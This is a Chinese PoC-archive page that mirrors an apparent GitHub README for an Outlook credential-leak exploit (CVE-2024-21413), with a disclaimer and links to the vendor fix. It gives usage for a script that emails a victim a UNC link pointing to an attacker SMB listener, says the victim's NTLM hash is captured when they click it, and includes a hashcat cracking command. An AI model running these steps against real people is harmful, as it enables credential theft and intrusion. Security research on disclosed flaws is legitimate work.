目标达成 感谢每一位支持者 — 我们达成了 100% 目标!

目标: 1000 元 · 已筹: 1000

100.0%
请我们喝杯咖啡

CVE-2024-21413 PoC — Microsoft Outlook 安全漏洞

来源
https://github.com/DevAkabari/CVE-2024-21413
关联漏洞
标题:Microsoft Outlook 安全漏洞 (CVE-2024-21413)
Description:Microsoft Outlook是美国微软(Microsoft)公司的一套电子邮件应用程序。 Microsoft Outlook 存在安全漏洞。以下产品和版本受到影响:Microsoft Office 2019 for 32-bit editions,Microsoft Office 2019 for 64-bit editions,Microsoft 365 Apps for Enterprise for 32-bit Systems,Microsoft 365 Apps for Enterprise
Description
CVE-2024-21413 exploit
介绍
# CVE-2024-21413 - Expect Script POC

Microsoft Outlook Leak credentials & Remote Code Execution Vulnerability when chained with CVE-2023-21716 (through the preview panel)
CVSS:3.1 9.8 / 8.5

Outlook should warm you about the risk on opening an external link => but this is not the case!

![image](https://github.com/duy-31/CVE-2024-21413/assets/20819326/3ad8442f-098b-4758-ac82-9ecf8970311f)

usage: ./cve-2024-21413.sh mx.fqdn port sender recipient url

./cve-2024-21413.sh mail.mydomain.com 25 me@home.com to@other.com "\\\\xx.xx.xx.xx\\test\\duy31.txt"

notes: chmod +x cve-2024-21413.sh

require app expect & require legitimate ip sender and email sender (to pass SPF, DKIM, DMARC)

---------------

- First run a smb listener like that
  
![image](https://github.com/duy-31/CVE-2024-21413/assets/20819326/aa7ed0a7-0da1-4555-bcd1-ef498d284c03)

- run the poc

![image](https://github.com/duy-31/CVE-2024-21413/assets/20819326/035b597d-c737-4002-afbb-9964bb5c0505)

- and wait for the email & in the preview windows click on the link

![image](https://github.com/duy-31/CVE-2024-21413/assets/20819326/f85c5add-6f40-47f9-9828-eccbc9788317)


- then you should retrieve the login & hash of the person that clicked on the link (without the warning prompt on affected outlook version)

  ![image](https://github.com/duy-31/CVE-2024-21413/assets/20819326/eabfbb68-adc6-4862-85da-5040fd8e557c)

- You can then try to crack the password with hashcat. Just copy all the line with the login name to a file and run hashcat with module 5600

hashcat -a 0 -m 5600 hash.txt rockyou.txt -o cracked.txt -O

- You can chain this CVE with CVE-2023-21716 to obtain RCE !!! 

-------------------

Kudos: [https://research.checkpoint.com/2024/the-risks-of-the-monikerlink-bug-in-microsoft-outlook-and-the-big-picture/]

Workaround/Fix: [https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21413]

-------------------

more about me ;) https://www.linkedin.com/in/duy-huan-bui/

⚠️ Disclaimer: IMPORTANT: This script is provided for educational, ethical testing, and lawful use ONLY. Do not use it on any system or network without explicit permission. Unauthorized access to computer systems and networks is illegal, and users caught performing unauthorized activities are subject to legal actions. The author is NOT responsible for any damage caused by the misuse of this script.
文件快照

 [4.0K]  /data/pocs/69f3cc3003a39ae69d4b2d7b92e8bb1b2ca5f513
├── [1.1K]  cve-2024-21413.sh
└── [2.3K]  README.md

0 directories, 2 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
    3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →